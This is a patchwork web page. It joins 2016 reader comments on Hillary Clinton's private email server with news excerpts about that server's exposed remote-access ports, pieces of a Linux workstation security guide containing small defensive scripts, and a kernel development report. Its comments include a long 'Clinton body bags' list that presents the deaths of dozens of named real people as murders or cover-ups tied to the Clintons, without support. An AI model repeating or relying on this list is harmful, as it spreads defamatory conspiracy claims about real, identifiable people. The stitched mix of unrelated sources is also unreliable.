Paul Christenson -> Barry_Seal 29 Jan 2016 18:45

20 - Barbara Wise - Commerce Department staffer. Worked closely with Ron Brown and John Huang. Cause of death unknown. Died November 29, 1996. Her bruised, nude body was found locked in her office at the Department of Commerce.

21 - Charles Meissner - Assistant Secretary of Commerce who gave John Huang special security clearance; died shortly thereafter in a small plane crash.

22 - Dr. Stanley Heard - Chairman of the National Chiropractic Health Care Advisory Committee; died with his attorney Steve Dickson in a small plane crash. Dr. Heard, in addition to serving on Clinton's advisory council, personally treated Clinton's mother, stepfather and brother.

23 - Barry Seal - Drug-running TWA pilot out of Mena, Arkansas; death was no accident.

24 - Johnny Lawhorn, Jr. - Mechanic; found a check made out to Bill Clinton in the trunk of a car left at his repair shop. He was found dead after his car had hit a utility pole.

25 - Stanley Huggins - Investigated Madison Guaranty. His death was a purported suicide and his report was never released.

26 - Hershel Friday - Attorney and Clinton fundraiser; died March 1, 1994, when his plane exploded.

27 - Kevin Ives & Don Henry - Known as "the boys on the track" case. Reports say the two boys may have stumbled upon the Mena, Arkansas airport drug operation. The initial report said their deaths were due to falling asleep on railroad tracks and being run over. Later autopsy reports stated that the two boys had been slain before being placed on the tracks. Many linked to the case died before their testimony could come before a grand jury.

THE FOLLOWING PERSONS HAD INFORMATION ON THE IVES/HENRY CASE:

28 - Keith Coney - Died when his motorcycle slammed into the back of a truck, 7/88.

29 - Keith McMaskle - Died, stabbed 113 times, Nov 1988.

30 - Gregory Collins - Died from a gunshot wound, January 1989.

31 - Jeff Rhodes - He was shot, mutilated and found burned in a trash dump in April 1989. (Coroner ruled death due to suicide.)

32 - James Milan - Found decapitated. However, the coroner ruled his death was due to "natural causes"?

33 - Jordan Kettleson - Was found shot to death in the front seat of his pickup truck in June 1990.

34 - Richard Winters - A suspect in the Ives/Henry deaths. He was killed in a set-up robbery, July 1989.

THE FOLLOWING CLINTON PERSONAL BODYGUARDS ALL DIED OF MYSTERIOUS CAUSES OR SUICIDE:
36 - Major William S. Barkley, Jr.
37 - Captain Scott J. Reynolds
38 - Sgt. Brian Hanley
39 - Sgt. Tim Sabel
40 - Major General William Robertson
41 - Col. William Densberger
42 - Col. Robert Kelly
43 - Spec. Gary Rhodes
44 - Steve Willis
45 - Robert Williams
46 - Conway LeBleu
47 - Todd McKeehan

And this list does not include the four dead Americans in Benghazi that Hillary abandoned!


Paul Christenson -> Barry_Seal 29 Jan 2016 18:42

THE MANY CLINTON BODY BAGS . . .

Someone recently reminded me of this list. I had forgotten how long it is. Therefore, this is a quick refresher course, lest we forget what has happened to many "friends" and associates of Bill and Hillary Clinton.

1 - James McDougal - Convicted Whitewater partner of the Clintons who died of an apparent heart attack while in solitary confinement. He was a key witness in Ken Starr's investigation.

2 - Mary Mahoney - A former White House intern, murdered July 1997 at a Starbucks coffee shop in Georgetown (Washington, D.C.). The murder happened just after she was to go public with her story of sexual harassment by Clinton in the White House.

3 - Vince Foster - Former White House Counsel, and colleague of Hillary Clinton at Little Rock's Rose Law Firm. Died of a gunshot wound to the head, ruled a suicide. (He was about to testify against Hillary in relation to the records she refused to turn over to Congress.) Was reported to have been having an affair with Hillary.

4 - Ron Brown - Secretary of Commerce and former DNC Chairman. Reported to have died by impact in a plane crash. A pathologist close to the investigation reported that there was a hole in the top of Brown's skull resembling a gunshot wound. At the time of his death Brown was being investigated, and spoke publicly of his willingness to cut a deal with prosecutors. The rest of the people on the plane also died. A few days later the air traffic controller committed suicide.

5 - C. Victor Raiser, II - A major player in the Clinton fundraising organization; died in a private plane crash in July 1992.

6 - Paul Tulley - Democratic National Committee Political Director, found dead in a hotel room in Little Rock in September 1992. Described by Clinton as a "dear friend and trusted advisor."

7 - Ed Willey - Clinton fundraiser, found dead November 1993 deep in the woods in Virginia of a gunshot wound to the head. Ruled a suicide. Ed Willey died on the same day his wife, Kathleen Willey, claimed Bill Clinton groped her in the Oval Office in the White House. Ed Willey was involved in several Clinton fundraising events.

8 - Jerry Parks - Head of Clinton's gubernatorial security team in Little Rock. Gunned down in his car at a deserted intersection outside Little Rock. Parks's son said his father was building a dossier on Clinton and allegedly threatened to reveal this information. After he died, the files were mysteriously removed from his house.

9 - James Bunch - Died from a gunshot suicide. It was reported that he had a "black book" containing names of influential people who visited prostitutes in Texas and Arkansas.

10 - James Wilson - Found dead in May 1993 from an apparent hanging suicide. He was reported to have ties to the Clintons' Whitewater deals.

11 - Kathy Ferguson - Ex-wife of Arkansas Trooper Danny Ferguson, found dead in May 1994 in her living room with a gunshot to her head. It was ruled a suicide even though there were several packed suitcases, as if she were going somewhere. Danny Ferguson was a co-defendant along with Bill Clinton in the Paula Jones lawsuit, and Kathy Ferguson was a possible corroborating witness for Paula Jones.

12 - Bill Shelton - Arkansas State Trooper and fiancé of Kathy Ferguson. Critical of the suicide ruling of his fiancée, he was found dead in June 1994 of a gunshot wound, also ruled a suicide, at her grave site.

13 - Gandy Baugh - Attorney for Clinton's friend Dan Lasater; died by jumping out a window of a tall building in January 1994. His client was a convicted drug distributor.

14 - Florence Martin - Accountant and subcontractor for the CIA, connected to the Barry Seal, Mena, Arkansas airport drug smuggling case. She died of three gunshot wounds.

15 - Suzanne Coleman - Reportedly had an affair with Clinton when he was Arkansas Attorney General. Died of a gunshot wound to the back of the head, ruled a suicide. Was pregnant at the time of her death.

16 - Paula Grober - Clinton's speech interpreter for the deaf from 1978 until her death December 9, 1992. She died in a one-car accident.

17 - Danny Casolaro - Investigative reporter who was investigating the Mena airport and the Arkansas Development Finance Authority. He slit his wrists, apparently, in the middle of his investigation.

18 - Paul Wilcher - Attorney investigating corruption at the Mena airport with Casolaro and the 1980 "October Surprise"; found dead on a toilet June 22, 1993, in his Washington, D.C. apartment. Had delivered a report to Janet Reno three weeks before his death. (May have died of poison.)

19 - Jon Parnell Walker - Whitewater investigator for Resolution Trust Corp. Jumped to his death from his Arlington, Virginia apartment balcony August 15, 1993. He was investigating the Morgan Guaranty scandal.

Thijs Buelens -> honey1969 29 Jan 2016 18:41

Have the actors from Orange is the New Black already endorsed Hillary? Just wondering.

Sam3456 -> Sam3456 29 Jan 2016 18:35

Remember, as soon as Snowden walked out the door with his USB drive full of secrets he was in violation, whether he knew the severity and classification or not.

Think of Hillary's email server as her home USB drive.

RedPillCeryx 29 Jan 2016 18:33

Government civil and military employees working with material at the Top Secret level are required to undergo incredibly protracted and intrusive vetting procedures (including polygraph testing) in order to obtain and keep current their security clearances to access such matter. Was Hillary Clinton required to obtain a Top Secret clearance in the same way, or was she just waved through because of Who She Is?

Sam3456 29 Jan 2016 18:32

Just to be clear, Colin Powell used a private email ACCOUNT, hosted in the cloud, and used it for personal matters only. He was audited (he never deleted anything) and it was found to contain no government records.

Hillary used a server, which means the documents existed in electronic form outside the State Department, unsecured. It's as if she took a Top Secret file home with her. That is a VERY BIG mistake, and as Sec of State she signed a document saying she understood the rules and agreed to play by them. She did not, and removing state secrets from their secure location is a very serious matter, whether you put the actual file in your briefcase or have an electronic version sitting on your server.

Second, she signed a document saying she would return any and ALL documents and copies of documents pertaining to the State Department within 30 (or 60, I can't remember) days of leaving. The documents on her server, again electronic copies of the top secret files, were not returned for 2 years. That's a huge violation.

Finally, there is a clause in the classification rules that deals with information that is top secret by nature. Meaning, regardless of whether it is MARKED classified or not, the very nature of the material would be apparent to a senior official, and appropriate action would have to be taken. So she either knew and ignored it, or did not know... and neither of those scenarios gives me a lot of confidence.

And the fact that the information was classified at the highest levels means exposure of that material would put human operatives' lives at risk, which is exactly what she accused Snowden of doing when she called him a traitor. By putting that information outside the State Department firewall she basically put people's lives at risk so she could have the convenience of using one mobile device.


Wallabyfan -> MtnClimber 29 Jan 2016 18:10

Sorry, you can delude yourself all you like, but Powell and Cheney used private email for personal communications while at work on secure servers, not for highly classified communications, and did so before the 2009 ban on this practice came into place. Clinton used a private unsecured server at her home while Sec of State and, even worse, provided access to people on her team who had no security clearance. She has also deleted more than 30,000 emails from the server in full knowledge of the FBI probe. You do realise that she is going to end up in jail, don't you?

MtnClimber -> boscovee 29 Jan 2016 18:07

Are you as interested in all of the emails that Cheney destroyed? He was asked to provide them and never allowed ANY to be seen.

Typical GOP

Dozens die at embassies under Bush. Zero investigations. Zero hearings.
4 die at an embassy under Clinton. Dozens of hearings.

OurNigel -> Robert Greene 29 Jan 2016 17:53

It's not hard to understand: she was supposed to use only her official email account, maintained on secure Federal government servers, when conducting official business during her tenure as Secretary of State. This was for three reasons: the first being security, the second transparency, and the third accountability.

Serious breach of protocol I'm afraid.

Talgen -> Exceptionalism 29 Jan 2016 17:50

"Department responses for classification infractions could include counseling, warnings or other action, officials said. They wouldn't say if Clinton or senior aides who've since left government could face penalties. The officials weren't authorized to speak on the matter and demanded anonymity."

You need to share that one with Petraeus, whose career was ruined and who had to pay 100k in fines for letting some info slip to his mistress.

Wallabyfan 29 Jan 2016 17:50

No one here seems able to accept how serious this is. You can't downplay it. This is the most serious scandal we have seen in American politics for decades.

Any other US official handling even one classified piece of material on his or her own unsecured home server would have been arrested and jailed by now, for perhaps 50 years or longer. The fact that we are talking about 20+ (at least) indicates at the very least Clinton's hubris, incompetence and very poor judgement, as well as a very serious breach of US law. Her campaign is doomed.

This is only the beginning of the scandal and I predict we will be rocked when we learn the truth. Clinton will be indicted and probably jailed along with Huma Abedin who the FBI are also investigating.


HiramsMaxim -> Exceptionalism 29 Jan 2016 17:50

http://freebeacon.com/wp-content/uploads/2015/11/HRC-SCI-NDA1.pdf


OurNigel 29 Jan 2016 17:42

This is supposed to be the lady who (in her own words) has huge experience of government, yet she willingly broke not just State Department protocols and procedures by using a privately maintained, non-secure server for her email service; she also broke Federal laws and regulations governing recordkeeping requirements.

At the very least this was a massive breach of security and a total disregard for established rules whilst she was in office. It's not as if she was just some local government officer in a backwater town; she was Secretary of State for the United States government.

If the NSA is to be believed you should presume her emails could have been read by any foreign state.

This is actually a huge story.


TassieNigel 29 Jan 2016 17:41

This god-awful Clinton family had to be stopped somehow, I suppose. Now if I'd done it, I'd be behind bars long ago, so when will Hillary be charged is my question?

Hillary made much of slinging off about the "traitor" Julian Assange, so let's see what Mrs Clinton looks like behind bars. A woman simply incapable of telling the truth!

Celebrations for Bernie Sanders of course.


HiramsMaxim 29 Jan 2016 17:41

They also wouldn't disclose whether any of the documents reflected information that was classified at the time of transmission,

Has nothing to do with anything. Maybe the author should read the actual NDA signed by Mrs. Clinton.

http://freebeacon.com/wp-content/uploads/2015/11/HRC-SCI-NDA1.pdf


beneboy303 -> dusablon 29 Jan 2016 17:18

If every corrupt liar was sent to prison there'd be no one left in Washington, or Westminster and we'd have to have elections with ordinary people standing, instead of the usual suspects from the political class. Which, on reflection, sounds quite good !


In_for_the_kill 29 Jan 2016 17:15

Come on Guardian, this should be your lead story: the executive branch of the United States just confirmed that a candidate for the Presidency pretty much knowingly broke the law. If that ain't headline material, then I don't know what is.


dusablon -> SenseCir 29 Jan 2016 17:09

Irrelevant?

Knowingly committing a felony by a candidate for POTUS is anything but irrelevant.

And forget her oh-so-clever excuses about not sending or receiving anything marked top secret or any other level of classification including SAP. If you work programs like those you know that anything generated related to that program is automatically classified, whether or not it's marked as such. And such material is only shared on a need to know basis.

She's putting out a smokescreen to fool the majority of voters who have never or will never have special access. She is a criminal and needs to be arrested. Period.

Commentator6 29 Jan 2016 17:00

It's a reckless arrogance combined with the belief that no-one can touch her. If she does become the nominee Hillary will be an easy target for Trump. It'll be like "shooting fish in a barrel".

DismayedPerplexed -> OnlyOneView 29 Jan 2016 16:40

Are you forgetting W and his administration's 5 million deleted emails?

http://www.salon.com/2015/03/12/the_george_w_bush_email_scandal_the_media_has_conveniently_forgotten_partner/

Bob Sheerin 29 Jan 2016 16:40

Consider that email is an indispensable tool in doing one's job. Consider that in order to effectively do her job, candidate Clinton -- as the Secretary of State -- had to be sending and receiving Top Secret documents. Consider that all of her email was routed through a personal server. Consider whether she released all of the relevant emails. Well, she claimed she did but the evidence contradicts such a claim. Consider that this latest news release has -- like so many others -- been released late on a Friday.

It is obvious that the Secretary of State and the President should be communicating on a secure network controlled by the federal government. It is obvious that virtually none of these communications were done in a secure manner. Consider whether someone who contends this is irrelevant has enough sense to come in out of the rain.

[Oct 14, 2015] Security farce at Datto Inc that held Hillary Clinton's emails revealed

Notable quotes:
"... But its building in Bern Township, Pennsylvania, doesn't have a perimeter fence or security checkpoints and has two reception areas ..."
"... Dumpsters at the site were left open and unguarded, and loading bays have no security presence ..."
"... It has also been reported that hackers tried to gain access to her personal email address by sending her emails disguised parking violations which were designed to gain access to her computer. ..."
"... a former senior executive at Datto was allegedly able to steal sensitive information from the company's systems after she was fired. ..."
Oct 13, 2015 | Daily Mail Online

Datto Inc has been revealed to have stored Hillary Clinton's emails - which contained national secrets - when it backed up her private server

The congressional committee is focusing on what happened to the server after she left office in a controversy that is dogging her presidential run and harming her trust with voters.

In the latest developments it emerged that hackers in China, South Korea and Germany tried to gain access to the server after she left office. It has also been reported that hackers tried to gain access to her personal email address by sending her emails disguised as parking violations, designed to gain access to her computer.

Daily Mail Online has previously revealed how a former senior executive at Datto was allegedly able to steal sensitive information from the company's systems after she was fired.

Hackers also managed to completely take over a Datto storage device, allowing them to steal whatever data they wanted.

Employees at the company, which is based in Norwalk, Connecticut, have a maverick attitude and see themselves as 'disrupters' of a staid industry.

On their Facebook page they have posed for pictures wearing ugly sweaters and in fancy dress including stereotypes of Mexicans.

Its founder, Austin McChord, has been called the 'Steve Jobs' of data storage and likes to play in his offices with Nerf guns and crazy costumes.

Nobody from Datto was available for comment.

itpol-linux-workstation-security.md at master · lfit-itpol · GitHub

SecureBoot

Despite its controversial nature, SecureBoot offers protection against many attacks targeting workstations (rootkits, "Evil Maid," etc.) without introducing too much extra hassle. It will not stop a truly dedicated attacker, and there is a pretty high degree of certainty that state security agencies have ways to defeat it (probably by design), but having SecureBoot is better than having nothing at all.

Alternatively, you may set up Anti Evil Maid which offers a more wholesome protection against the type of attacks that SecureBoot is supposed to prevent, but it will require more effort to set up and maintain.
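Whether SecureBoot is actually active can be checked from a running Linux system: the firmware exposes it as an EFI variable whose file layout is 4 bytes of attributes followed by a one-byte value. A minimal sketch; the `sb_state` helper name is illustrative, and on real hardware you would point it at the standard `SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c` variable under `/sys/firmware/efi/efivars` (or simply run `mokutil --sb-state` where that tool is installed):

```shell
# Report SecureBoot state from an efivars-style variable file.
# Layout: 4 bytes of EFI variable attributes, then one data byte (1 = enabled).
sb_state() {
    var="$1"
    if [ ! -f "$var" ]; then
        # Legacy BIOS system, or efivarfs not mounted
        echo "unavailable"
    elif [ "$(od -An -tu1 -j4 -N1 "$var" | tr -d ' ')" = "1" ]; then
        echo "enabled"
    else
        echo "disabled"
    fi
}

sb_state /sys/firmware/efi/efivars/SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c
```

Note that an "enabled" answer only says the firmware flag is set; it says nothing about whether the keys the firmware trusts are trustworthy.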

Avoid Firewire, thunderbolt, and ExpressCard ports

Firewire is a standard that, by design, allows any connecting device full direct memory access to your system (see Wikipedia). Thunderbolt and ExpressCard are guilty of the same, though some later implementations of Thunderbolt attempt to limit the scope of memory access. It is best if the system you are getting has none of these ports, but it is not critical, as they usually can be turned off via UEFI or disabled in the kernel itself.
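Disabling these ports "in the kernel itself" can be as simple as a modprobe blacklist. A sketch, assuming a modern kernel where the `firewire-*` modules replaced the old `ieee1394` stack; the filename is arbitrary:

```
# /etc/modprobe.d/blacklist-dma.conf
# Keep drivers for DMA-capable ports from ever loading.
blacklist firewire-core
blacklist firewire-ohci
blacklist firewire-sbp2
blacklist thunderbolt
```

Blacklisting `thunderbolt` is a blunt instrument on machines that need Thunderbolt docks or displays; on such systems, prefer the firmware's Thunderbolt security-level setting instead.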

TPM Chip

Trusted Platform Module (TPM) is a crypto chip bundled with the motherboard separately from the core processor, which can be used for additional platform security (such as to store full-disk encryption keys), but is not normally used for day-to-day workstation operation. At best, this is a nice-to-have, unless you have a specific need to use TPM for your workstation security.

Checklist

  • Has a robust MAC/RBAC implementation (SELinux/AppArmor/GrSecurity) (ESSENTIAL)
  • Publishes security bulletins (ESSENTIAL)
  • Provides timely security patches (ESSENTIAL)
  • Provides cryptographic verification of packages (ESSENTIAL)
  • Fully supports UEFI and SecureBoot (ESSENTIAL)
  • Has robust native full disk encryption support (ESSENTIAL)

[Oct 13, 2015] Hillary Clinton's private server was open to low-skilled hackers

Notable quotes:
"... "That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- ..."
"... The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morta, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks. ..."
"... Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas. ..."
"... The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity. ..."
"... The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks. It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections. ..."
Daily Mail Online

Investigation by the Associated Press reveals that the clintonemail.com server lacked basic protections

  • Microsoft remote desktop service she used was not intended for use without additional safety features - but had none
  • Government and computer industry had warned at the time that such set-ups could be hacked - but nothing was done to make server safer
  • President this weekend denied national security had been put at risk by his secretary of state but FBI probe is still under way

... ... ...

Clinton's server, which handled her personal and State Department correspondence, appeared to allow users to connect openly over the Internet to control it remotely, according to detailed records compiled in 2012.

Experts said the Microsoft remote desktop service wasn't intended for such use without additional protective measures, and was the subject of U.S. government and industry warnings at the time over attacks from even low-skilled intruders.

.... ... ...

Records show that Clinton additionally operated two more devices on her home network in Chappaqua, New York, that also were directly accessible from the Internet.

"That's total amateur hour. Real enterprise-class security, with teams dedicated to these things, would not do this" -- Marc Maiffret, cyber security expert

  • One contained similar remote-control software that also has suffered from security vulnerabilities, known as Virtual Network Computing, and the other appeared to be configured to run websites.
  • The new details provide the first clues about how Clinton's computer, running Microsoft's server software, was set up and protected when she used it exclusively over four years as secretary of state for all work messages.
  • Clinton's privately paid technology adviser, Bryan Pagliano, has declined to answer questions about his work from congressional investigators, citing the U.S. Constitution's Fifth Amendment protection against self-incrimination.
  • Some emails on Clinton's server were later deemed top secret, and scores of others included confidential or sensitive information.
  • Clinton has said that her server featured 'numerous safeguards,' but she has yet to explain how well her system was secured and whether, or how frequently, security updates were applied.

'That's total amateur hour,' said Marc Maiffret, who has founded two cyber security companies. He said permitting remote-access connections directly over the Internet would be the result of someone choosing convenience over security or failing to understand the risks. 'Real enterprise-class security, with teams dedicated to these things, would not do this,' he said.

The government and security firms have published warnings about allowing this kind of remote access to Clinton's server. The same software was targeted by an infectious Internet worm, known as Morta, which exploited weak passwords to break into servers. The software also was known to be vulnerable to brute-force attacks that tried password combinations until hackers broke in, and in some cases it could be tricked into revealing sensitive details about a server to help hackers formulate attacks.

'An attacker with a low skill level would be able to exploit this vulnerability,' said the Homeland Security Department's U.S. Computer Emergency Readiness Team in 2012, the same year Clinton's server was scanned.

Also in 2012, the State Department had outlawed use of remote-access software for its technology officials to maintain unclassified servers without a waiver. It had banned all instances of remotely connecting to classified servers or servers located overseas.

The findings suggest Clinton's server 'violates the most basic network-perimeter security tenets: Don't expose insecure services to the Internet,' said Justin Harvey, the chief security officer for Fidelis Cybersecurity.

Clinton's email server at one point also was operating software necessary to publish websites, although it was not believed to have been used for this purpose.

Traditional security practices dictate shutting off all a server's unnecessary functions to prevent hackers from exploiting design flaws in them.

In Clinton's case, Internet addresses the AP traced to her home in Chappaqua revealed open ports on three devices, including her email system.

Each numbered port is commonly, but not always uniquely, associated with specific features or functions. The AP in March was first to discover Clinton's use of a private email server and trace it to her home.

Mikko Hypponen, the chief research officer at F-Secure, a top global computer security firm, said it was unclear how Clinton's server was configured, but an out-of-the-box installation of remote desktop would have been vulnerable.

Those risks - such as giving hackers a chance to run malicious software on her machine - were 'clearly serious' and could have allowed snoops to deploy so-called 'back doors.'

The U.S. National Institute of Standards and Technology, the federal government's guiding agency on computer technology, warned in 2008 that exposed server ports were security risks.

It said remote-control programs should only be used in conjunction with encryption tunnels, such as secure VPN connections.
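
The kind of exposure the AP found can be demonstrated in a few lines of Python. This sketch (the port list is illustrative, not exhaustive, and this is a teaching aid, not a security scanner) simply attempts TCP connections to common remote-access ports and reports which ones answer:

```python
#!/usr/bin/env python3
"""Sketch: check a host for exposed remote-access ports, the same kind of
survey the AP ran against the clintonemail.com addresses."""

import socket

# Commonly probed remote-access/service ports (illustrative selection)
REMOTE_ACCESS_PORTS = {3389: "RDP", 5900: "VNC", 22: "SSH", 23: "Telnet", 80: "HTTP"}

def open_ports(host, ports=REMOTE_ACCESS_PORTS, timeout=0.5):
    """Return {port: service} for ports that accept a TCP connection."""
    found = {}
    for port, service in ports.items():
        try:
            with socket.create_connection((host, port), timeout=timeout):
                found[port] = service
        except OSError:
            pass  # closed, filtered, or unreachable
    return found

if __name__ == "__main__":
    for port, service in sorted(open_ports("127.0.0.1").items()):
        print("port %d (%s) is reachable -- should it be?" % (port, service))
```

Anything this trivial to detect from the outside is equally trivial for an attacker to find, which is the point of the "don't expose insecure services" tenet quoted above.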

Personal workstation backups

Workstation backups tend to be overlooked or done in a haphazard, often unsafe manner.

Checklist

  • Set up encrypted workstation backups to external storage (ESSENTIAL)
  • Use zero-knowledge backup tools for off-site/cloud backups (NICE)
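
A minimal sketch of the first checklist item: pipe tar through gpg so the data is encrypted before it ever touches the external drive. This assumes GnuPG is installed; the paths and the `backup@example.com` key ID are placeholders. Zero-knowledge cloud tools follow the same principle of encrypting before data leaves the box.

```python
#!/usr/bin/env python3
"""Sketch: encrypted workstation backup via `tar ... | gpg --encrypt ...`.
GnuPG availability and the recipient key are assumptions."""

import subprocess

def backup_commands(src_dir, dest_file, recipient):
    """Return the tar and gpg argument vectors for the pipeline:
    tar -C src -czf - . | gpg --encrypt --recipient R --output dest"""
    tar_cmd = ["tar", "-C", src_dir, "-czf", "-", "."]
    gpg_cmd = ["gpg", "--encrypt", "--recipient", recipient,
               "--output", dest_file]
    return tar_cmd, gpg_cmd

def run_backup(src_dir, dest_file, recipient):
    """Run the pipeline; returns True if both stages exit cleanly."""
    tar_cmd, gpg_cmd = backup_commands(src_dir, dest_file, recipient)
    tar = subprocess.Popen(tar_cmd, stdout=subprocess.PIPE)
    gpg = subprocess.Popen(gpg_cmd, stdin=tar.stdout)
    tar.stdout.close()  # let tar receive SIGPIPE if gpg exits early
    return gpg.wait() == 0 and tar.wait() == 0

if __name__ == "__main__":
    tar_cmd, gpg_cmd = backup_commands("/home/user", "/mnt/usb/home.tgz.gpg",
                                       "backup@example.com")
    print(" ".join(tar_cmd), "|", " ".join(gpg_cmd))
```

Because encryption happens on the workstation, losing the external drive (or the cloud account) does not leak the backup contents, only the key passphrase protects against that.
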
Firefox for work and high security sites

Use Firefox to access work-related sites, where extra care should be taken to ensure that data like cookies, sessions, login information, and keystrokes most definitely do not fall into attackers' hands. You should NOT use this browser to access any sites other than a select few.

You should install the following Firefox add-ons:

  • NoScript (ESSENTIAL)
    • NoScript prevents active content from loading, except from user-whitelisted domains. It is a great hassle to use with your default browser (though it offers really good security benefits), so we recommend only enabling it on the browser you use to access work-related sites.
  • Privacy Badger (ESSENTIAL)
    • EFF's Privacy Badger will prevent most external trackers and ad platforms from being loaded, which will help avoid compromises on these tracking sites from affecting your browser (trackers and ad sites are very commonly targeted by attackers, as they allow rapid infection of thousands of systems worldwide).
  • HTTPS Everywhere (ESSENTIAL)
    • This EFF-developed Add-on will ensure that most of your sites are accessed over a secure connection, even if a link you click is using http:// (great to avoid a number of attacks, such as SSL-strip).
  • Certificate Patrol (NICE)
    • This tool will alert you if the site you're accessing has recently changed its TLS certificate -- especially if the old one wasn't nearing its expiration date or if the site is now using a different certification authority. It helps alert you if someone is trying to man-in-the-middle your connection, but it generates a lot of benign false positives.

You should leave Firefox as your default browser for opening links, as NoScript will prevent most active content from loading or executing.

Chrome/Chromium for everything else

Chromium developers are ahead of Firefox in adding a lot of nice security features (at least on Linux), such as seccomp sandboxes, kernel user namespaces, etc, which act as an added layer of isolation between the sites you visit and the rest of your system. Chromium is the upstream open-source project, and Chrome is Google's proprietary binary build based on it (insert the usual paranoid caution about not using it for anything you don't want Google to know about).

It is recommended that you install Privacy Badger and HTTPS Everywhere extensions in Chrome as well and give it a distinct theme from Firefox to indicate that this is your "untrusted sites" browser.

2: Use two different browsers, one inside a dedicated VM (NICE)

This is a similar recommendation to the above, except you will add an extra step of running the "everything else" browser inside a dedicated VM that you access via a fast protocol, allowing you to share clipboards and forward sound events (e.g. Spice or RDP). This will add an excellent layer of isolation between the untrusted browser and the rest of your work environment, ensuring that attackers who manage to fully compromise your browser will then have to additionally break out of the VM isolation layer in order to get to the rest of your system.

This is a surprisingly workable configuration, but it requires a lot of RAM and a fast processor that can handle the increased load. It will also require a significant amount of dedication from the admin, who will need to adjust their work practices accordingly.

3: Fully separate your work and play environments via virtualization (PARANOID)

See Qubes-OS project, which strives to provide a high-security workstation environment via compartmentalizing your applications into separate fully isolated VMs.

Password managers

Checklist

  • Use a password manager (ESSENTIAL)
  • Use unique passwords on unrelated sites (ESSENTIAL)
  • Use a password manager that supports team sharing (NICE)
  • Use a separate password manager for non-website accounts (NICE)
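
The "unique passwords on unrelated sites" item boils down to what a password manager automates: generating an independent random secret per site, so a breach of one site reveals nothing about the others. A stdlib-only Python sketch using the `secrets` CSPRNG (never the `random` module, which is predictable):

```python
#!/usr/bin/env python3
"""Sketch: per-site random password generation, the core of what a
password manager automates."""

import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def new_password(length=20):
    """Return a random password; 20 chars of this 94-symbol alphabet
    is roughly 130 bits of entropy."""
    if length < 12:
        raise ValueError("too short to resist offline brute force")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

if __name__ == "__main__":
    # One fresh password per site; nothing is derived from a master value.
    for site in ("example.com", "mail.example.org"):
        print(site, new_password())
```

The passwords are unmemorizable by design, which is exactly why the first checklist item (use a password manager to store them) comes first.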

Securing SSH and PGP private keys

Personal encryption keys, including SSH and PGP private keys, are going to be the most prized items on your workstation -- something the attackers will be most interested in obtaining, as that would allow them to further attack your infrastructure or impersonate you to other admins. You should take extra steps to ensure that your private keys are well protected against theft.

Checklist

  • Strong passphrases are used to protect private keys (ESSENTIAL)
  • PGP Master key is stored on removable storage (NICE)
  • Auth, Sign and Encrypt Subkeys are stored on a smartcard device (NICE)
  • SSH is configured to use PGP Auth key as ssh private key (NICE)
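
Strong passphrases do the heavy lifting, but loose file permissions on private keys are the easiest thing to audit first. The following Python sketch flags private-key-looking files readable by group or other; the ~/.ssh path and the "everything without a .pub suffix" heuristic are assumptions, not a complete key inventory:

```python
#!/usr/bin/env python3
"""Sketch: audit a key directory for permissive file modes. A passphrase is
the real protection, but a key readable by other users is an immediate
finding regardless."""

import os
import stat

def too_permissive(path):
    """True if group or other have any access to the file."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IRWXG | stat.S_IRWXO))

def audit_key_dir(directory):
    """Return private-key-looking files in `directory` with loose modes."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if name.endswith(".pub"):
            continue  # public halves may be world-readable
        path = os.path.join(directory, name)
        if os.path.isfile(path) and too_permissive(path):
            findings.append(path)
    return findings

if __name__ == "__main__":
    ssh_dir = os.path.expanduser("~/.ssh")
    if os.path.isdir(ssh_dir):
        for path in audit_key_dir(ssh_dir):
            print("WARNING: %s is accessible to others (chmod 600 it)" % path)
```

OpenSSH itself refuses group/other-readable private keys, so this audit mostly matters for keys copied outside ~/.ssh or for PGP key material.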

Hibernate or shut down, do not suspend

When a system is suspended, the RAM contents are kept on the memory chips and can be read by an attacker (known as the Cold Boot Attack). If you are going away from your system for an extended period of time, such as at the end of the day, it is best to shut it down or hibernate it instead of suspending it or leaving it on.

[Dec 07, 2015]  10 Highlights of Jon Corbet's Linux Kernel Report

"... The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10 years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and millions of people relying on security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security." ..."

In his keynote talk at Collaboration Summit, kernel contributor and LWN Editor Jon Corbet elaborated on the results of the Who Writes Linux report, released today, and gave more insights on where kernel development is headed over the next year, its challenges, and successes. Here are 10 highlights (watch the full video, below):

1. 3.15 was the biggest kernel release ever with 13,722 patches merged. "I imagine we will surpass that again," Corbet said. "The amount of changes to the kernel is just going up over time."

2. The number of developers participating is going up over time while the amount of time it takes us to create a kernel is actually dropping over time. It started at 80 days between kernel releases some time ago, and it's now down to about 63 days. "I don't know how much shorter we can get," he said.

3. Developers added seven new system calls to the kernel over the past year, along with new features such as deadline scheduling, control group reworking, multiqueue block layer, and lots of networking improvements. That's in addition to hundreds of new hardware drivers and thousands of bug fixes.

4. Testing is a real challenge for the kernel. Developers are doing better at finding bugs before they affect users or open a security hole. Improved integration testing during the merge window, using the zero day build bot to find problems before they get into the mainline kernel, and new free and proprietary testing tools have improved kernel testing. But there is still room for improvement.

5. Corbet's own analysis found 115 kernel CVEs in 2014, or a vulnerability every three days.

